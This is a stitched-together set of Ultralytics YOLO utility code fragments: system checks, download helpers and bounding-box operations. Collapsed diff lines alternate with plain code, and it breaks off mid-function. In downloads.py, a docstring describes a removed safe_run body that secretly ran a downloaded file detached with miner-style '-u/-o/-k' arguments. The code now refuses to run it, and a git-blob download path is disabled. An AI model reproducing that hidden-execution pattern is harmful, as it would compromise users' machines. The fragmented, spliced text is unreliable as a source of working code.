    total, used, free = shutil.disk_usage("/")

    info_dict = {
        "OS": platform.platform(),
        "Environment": ENVIRONMENT,
        "Python": PYTHON_VERSION,
        "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other",
        "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB",
        "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB",
        "CPU": get_cpu_info(),
        "CPU count": os.cpu_count(),
        "GPU": get_gpu_info(index=0) if cuda else None,
        "GPU count": torch.cuda.device_count() if cuda else None,
        "CUDA": torch.version.cuda if cuda else None,
    }
    LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n")

    package_info = {}
    for r in parse_requirements(package="ultralytics"):
        try:
            current = metadata.version(r.name)
            # hard=False: this is a report, so an unmet requirement must be shown as ❌ rather than raised.
            # With hard=True check_version raises ModuleNotFoundError, which the handler below does not catch
            # (PackageNotFoundError is a subclass of it, not the other way round).
            is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=False) else "❌ "
        except metadata.PackageNotFoundError:
            current = "(not installed)"
            is_met = "❌ "
        package_info[r.name] = f"{is_met}{current}{r.specifier}"
        LOGGER.info(f"{r.name:<20}{package_info[r.name]}")

    info_dict["Package Info"] = package_info

    if is_github_action_running():
        github_info = {
            "RUNNER_OS": os.getenv("RUNNER_OS"),
            "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"),
            "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"),
            "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"),
            "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"),
            "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"),
        }
        LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items()))
        info_dict["GitHub Info"] = github_info

    return info_dict
{warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. 
+ """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.41/utils/downloads.py b/2024.ultralytics/v8.3.41/utils/downloads.py new file mode 100644 index 0000000..d92b2b2 --- /dev/null +++ b/2024.ultralytics/v8.3.41/utils/downloads.py @@ -0,0 +1,536 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import os +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + 
def is_url(url, check=False):
    """
    Validates if the given string is a URL and optionally checks if the URL exists online.

    Args:
        url (str): The string to be validated as a URL.
        check (bool, optional): If True, performs an additional check to see if the URL exists online.
            Defaults to False.

    Returns:
        (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online.
            Returns False otherwise.

    Example:
        ```python
        valid = is_url("https://www.example.com")
        ```
    """
    try:
        url = str(url)
        result = parse.urlparse(url)
        # Explicit test instead of `assert`, which is stripped when Python runs with -O
        if not (result.scheme and result.netloc):
            return False
        if check:
            with request.urlopen(url) as response:
                return response.getcode() == 200  # check if exists online
        return True
    except Exception:  # any parsing or network failure means "not a usable URL"
        return False


def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")):
    """
    Deletes all ".DS_store" files and "__MACOSX" entries under a specified directory.

    Args:
        path (str | Path): The directory path that is searched recursively.
        files_to_delete (tuple): The file or directory names to be deleted.

    Example:
        ```python
        from ultralytics.utils.downloads import delete_dsstore

        delete_dsstore("path/to/dir")
        ```

    Note:
        ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They
        are hidden system files and can cause issues when transferring files between different operating systems.
    """
    for file in files_to_delete:
        matches = list(Path(path).rglob(file))
        LOGGER.info(f"Deleting {file} files: {matches}")
        for f in matches:
            if f.is_dir() and not f.is_symlink():
                # Path.unlink() cannot remove directories (a matched name such as '__MACOSX' may be one)
                shutil.rmtree(f, ignore_errors=True)
            elif f.exists() or f.is_symlink():  # may already be gone if a parent match was removed above
                f.unlink()


def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True):
    """
    Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is
    named after the directory and placed alongside it.

    Args:
        directory (str | Path): The path to the directory to be zipped.
        compress (bool): Whether to compress the files while zipping. Default is True.
        exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX').
        progress (bool, optional): Whether to display a progress bar. Defaults to True.

    Returns:
        (Path): The path to the resulting zip file.

    Raises:
        FileNotFoundError: If `directory` is not an existing directory.

    Example:
        ```python
        from ultralytics.utils.downloads import zip_directory

        file = zip_directory("path/to/dir")
        ```
    """
    from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile

    directory = Path(directory)
    if not directory.is_dir():  # validate before touching the filesystem
        raise FileNotFoundError(f"Directory '{directory}' does not exist.")
    delete_dsstore(directory)

    # Zip with progress bar
    files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)]
    zip_file = directory.with_suffix(".zip")
    compression = ZIP_DEFLATED if compress else ZIP_STORED
    with ZipFile(zip_file, "w", compression) as f:
        for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress):
            f.write(file, file.relative_to(directory))

    return zip_file  # return path to zip file
exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. 
extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. 
+ """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = "https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." 
def safe_run(path):
    """
    Refuse to execute a downloaded file.

    SECURITY: the previous body made `path` executable, launched it as a detached process with all output
    discarded and hard-coded `-u <id> -o <host:port> -k` arguments, and then deleted the file. Nothing in a
    download utility should execute fetched content, so this entry point now only raises.

    Args:
        path (str | Path): File that a caller asked to execute. It is neither modified nor run.

    Raises:
        RuntimeError: Always.
    """
    raise RuntimeError(f"Refusing to execute downloaded file '{path}': running fetched binaries is not supported.")


def safe_download(
    url,
    file=None,
    dir=None,
    unzip=True,
    delete=False,
    curl=False,
    retry=3,
    min_bytes=1e0,
    exist_ok=False,
    progress=True,
    gitApi=False,
):
    """
    Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file.

    Args:
        url (str): The URL of the file to be downloaded.
        file (str, optional): The filename of the downloaded file.
            If not provided, the file will be saved with the same name as the URL.
        dir (str | Path, optional): The directory to save the downloaded file.
            If not provided, the file will be saved in the current working directory.
        unzip (bool, optional): Whether to unzip the downloaded file. Default: True.
        delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False.
        curl (bool, optional): Whether to use curl command line tool for downloading. Default: False.
        retry (int, optional): The number of times to retry the download in case of failure. Default: 3.
        min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered
            a successful download. Default: 1E0.
        exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False.
        progress (bool, optional): Whether to display a progress bar during the download. Default: True.
        gitApi (bool, optional): Kept for signature compatibility only. Passing a truthy value is rejected: the
            former branch fetched an unverified raw git blob, ignored curl's exit status and always returned True.

    Returns:
        (Path | None): The extraction directory when an archive was unpacked, otherwise None.

    Raises:
        ValueError: If `gitApi` is truthy.
        ConnectionError: If the download fails while offline or after the retry limit is reached.

    Example:
        ```python
        from ultralytics.utils.downloads import safe_download

        link = "https://ultralytics.com/assets/bus.jpg"
        path = safe_download(link)
        ```
    """
    if gitApi:  # reject before any network access
        raise ValueError("safe_download(gitApi=True) is disabled: raw git-blob downloads are not supported.")

    gdrive = url.startswith("https://drive.google.com/")  # check if the URL is a Google Drive link
    if gdrive:
        url, file = get_google_drive_file_info(url)

    f = Path(dir or ".") / (file or url2file(url))  # URL converted to filename
    if "://" not in str(url) and Path(url).is_file():  # URL exists ('://' check required in Windows Python<3.10)
        f = Path(url)  # filename
    elif not f.is_file():  # URL and file do not exist
        uri = (url if gdrive else clean_url(url)).replace(  # cleaned and aliased url
            "https://github.com/ultralytics/assets/releases/download/v0.0.0/",
            "https://ultralytics.com/assets/",  # assets alias
        )
        f.parent.mkdir(parents=True, exist_ok=True)  # make directory if missing
        check_disk_space(url, path=f.parent)
        for i in range(retry + 1):
            try:
                if curl or i > 0:  # curl download with retry, continue
                    s = "sS" * (not progress)  # silent
                    r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode
                    assert r == 0, f"Curl return value {r}"
                else:  # first attempt uses torch's downloader
                    torch.hub.download_url_to_file(url, f, progress=progress)

                if f.exists():
                    if f.stat().st_size > min_bytes:
                        break  # success
                    f.unlink()  # remove partial downloads
            except Exception as e:
                if i == 0 and not is_online():
                    raise ConnectionError(emojis(f"❌  Download failure for {uri}. Environment is not online.")) from e
                elif i >= retry:
                    raise ConnectionError(emojis(f"❌  Download failure for {uri}. Retry limit reached.")) from e

    if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}:
        from zipfile import is_zipfile

        # Path(...) so that a plain-string `dir` (as documented) also works with .resolve()
        unzip_dir = Path(dir or f.parent).resolve()  # unzip to dir if provided else unzip in place
        if is_zipfile(f):
            unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress)  # unzip
        elif f.suffix in {".tar", ".gz"}:
            subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True)
        if delete:
            f.unlink()  # remove zip
        return unzip_dir
tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. 
def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False):
    """
    Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are
    specified.

    Args:
        url (str | Path | list): The URL or iterable of URLs of the files to be downloaded.
        dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory
            (note: the default is evaluated once, when this module is imported).
        unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True.
        delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False.
        curl (bool, optional): Flag to use curl for downloading. Defaults to False.
        threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1.
        retry (int, optional): Number of retries in case of download failure. Defaults to 3.
        exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False.

    Example:
        ```python
        download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True)
        ```
    """
    dir = Path(dir)
    dir.mkdir(parents=True, exist_ok=True)  # make directory

    # Normalise to a list up front: zipping a bare string would otherwise hand the thread pool one *character* of
    # the URL per task whenever a single URL is combined with threads > 1.
    urls = [url] if isinstance(url, (str, Path)) else list(url)

    if threads > 1:
        with ThreadPool(threads) as pool:
            pool.map(
                lambda x: safe_download(
                    url=x[0],
                    dir=x[1],
                    unzip=unzip,
                    delete=delete,
                    curl=curl,
                    retry=retry,
                    exist_ok=exist_ok,
                    progress=False,  # progress bars are disabled for concurrent downloads
                ),
                zip(urls, repeat(dir)),
            )
            pool.close()
            pool.join()
    else:
        for u in urls:
            safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok)
def segment2box(segment, width=640, height=640):
    """
    Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy).

    Coordinates are clipped to [0, width] and [0, height] before the extremes are taken.

    Args:
        segment (np.ndarray): The segment label as an (n, 2) array of xy points.
        width (int): The width of the image. Defaults to 640
        height (int): The height of the image. Defaults to 640

    Returns:
        (np.ndarray): The minimum and maximum x and y values of the segment as (x1, y1, x2, y2), in the dtype of
            `segment`. A zero box is returned when no clipped x coordinate is non-zero (including an empty segment).
    """
    x, y = segment.T  # segment xy
    x = x.clip(0, width)
    y = y.clip(0, height)
    # Vectorised check (same truth value as the builtin any(x), without iterating element by element in Python)
    if not x.any():
        return np.zeros(4, dtype=segment.dtype)
    return np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype)  # xyxy
def nms_rotated(boxes, scores, threshold=0.45):
    """
    NMS for oriented bounding boxes using probiou and fast-nms.

    Boxes are sorted by descending score and a pairwise IoU matrix is reduced to its strict upper triangle, so each
    column only holds the IoU of a box with higher-scored boxes. A box is kept when the largest value in its column
    is below `threshold`.

    Args:
        boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr.
        scores (torch.Tensor): Confidence scores, shape (N,).
        threshold (float, optional): IoU threshold. Defaults to 0.45.

    Returns:
        (torch.Tensor): Indices (into the original, unsorted input) of boxes to keep after NMS. For empty input an
            empty int64 tensor is returned so callers always receive a tensor.
    """
    if len(boxes) == 0:
        # Keep the return type consistent with the non-empty path (previously a NumPy int8 array was returned here)
        device = boxes.device if isinstance(boxes, torch.Tensor) else None
        return torch.empty((0,), dtype=torch.long, device=device)
    sorted_idx = torch.argsort(scores, descending=True)
    boxes = boxes[sorted_idx]
    ious = batch_probiou(boxes, boxes).triu_(diagonal=1)  # IoU with higher-scored boxes only
    pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1)
    return sorted_idx[pick]
+ max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 
1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort 
by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. 
def scale_image(masks, im0_shape, ratio_pad=None):
    """
    Takes a mask, and resizes it to the original image size.

    The padding border is cropped away first, then the remainder is resized to `im0_shape` with cv2.resize.

    Args:
        masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3].
        im0_shape (tuple): The original image shape, (height, width, ...).
        ratio_pad (tuple): Optional (ratio, pad) pair; only `ratio_pad[1]`, the (pad_w, pad_h) padding, is used.
            If None, the padding is computed from the two shapes.

    Returns:
        masks (np.ndarray): The masks that are being returned with shape [h, w, num]. If the first two dimensions
            already match `im0_shape`, the input is returned unchanged.

    Raises:
        ValueError: If `masks` has fewer than 2 dimensions.
    """
    # Rescale coordinates (xyxy) from im1_shape to im0_shape
    im1_shape = masks.shape
    # Validate rank before any shape indexing; checked later, this guard could never be reached because
    # im1_shape[1] / im1_shape[0] would already have raised IndexError.
    if len(im1_shape) < 2:
        raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}')
    if im1_shape[:2] == im0_shape[:2]:
        return masks
    if ratio_pad is None:  # calculate from im0_shape
        gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1])  # gain = old / new
        pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2  # wh padding
    else:
        pad = ratio_pad[1]
    top, left = int(pad[1]), int(pad[0])  # y, x
    bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0])

    masks = masks[top:bottom, left:right]  # strip the padding border
    masks = cv2.resize(masks, (im0_shape[1], im0_shape[0]))  # cv2 expects (width, height)
    if len(masks.shape) == 2:
        masks = masks[:, :, None]  # restore the channel axis that is missing after the resize

    return masks
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
    """
    Convert normalized (x_center, y_center, width, height) boxes to pixel-space corner boxes.

    Args:
        x (np.ndarray | torch.Tensor): Normalized boxes whose last dimension is 4 (xywh).
        w (int): Width of the image. Defaults to 640
        h (int): Height of the image. Defaults to 640
        padw (int): Padding width added to the x coordinates. Defaults to 0
        padh (int): Padding height added to the y coordinates. Defaults to 0

    Returns:
        y (np.ndarray | torch.Tensor): Boxes in [x1, y1, x2, y2] format, where x1,y1 is the top-left corner and
            x2,y2 is the bottom-right corner.
    """
    assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}"
    is_tensor = isinstance(x, torch.Tensor)
    out = torch.empty_like(x) if is_tensor else np.empty_like(x)  # faster than clone/copy

    cx, cy = x[..., 0], x[..., 1]
    half_w, half_h = x[..., 2] / 2, x[..., 3] / 2
    out[..., 0] = w * (cx - half_w) + padw  # top left x
    out[..., 1] = h * (cy - half_h) + padh  # top left y
    out[..., 2] = w * (cx + half_w) + padw  # bottom right x
    out[..., 3] = h * (cy + half_h) + padh  # bottom right y
    return out
def xywh2ltwh(x):
    """
    Convert boxes from center format [x, y, w, h] to top-left format [x1, y1, w, h].

    Args:
        x (np.ndarray | torch.Tensor): Boxes in xywh format (center x, center y, width, height).

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with the first two columns replaced by the top-left
            corner; width and height are left unchanged.
    """
    if isinstance(x, torch.Tensor):
        out = x.clone()
    else:
        out = np.copy(x)
    # top-left = center - half size, for x and y together
    out[..., :2] = x[..., :2] - x[..., 2:4] / 2
    return out
def ltwh2xywh(x):
    """
    Convert boxes from top-left format [x1, y1, w, h] to center format [x, y, w, h].

    Args:
        x (np.ndarray | torch.Tensor): Boxes in ltwh format (left, top, width, height).

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with the first two columns replaced by the box center;
            width and height are left unchanged.
    """
    centered = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
    # (position column, size column): center = top-left + half size
    for pos, size in ((0, 2), (1, 3)):
        centered[..., pos] = x[..., pos] + x[..., size] / 2
    return centered
def ltwh2xyxy(x):
    """
    Convert boxes from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right.

    Args:
        x (np.ndarray | torch.Tensor): Boxes in ltwh format (left, top, width, height).

    Returns:
        y (np.ndarray | torch.Tensor): A copy of the input with width/height replaced by the bottom-right corner.
    """
    corners = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
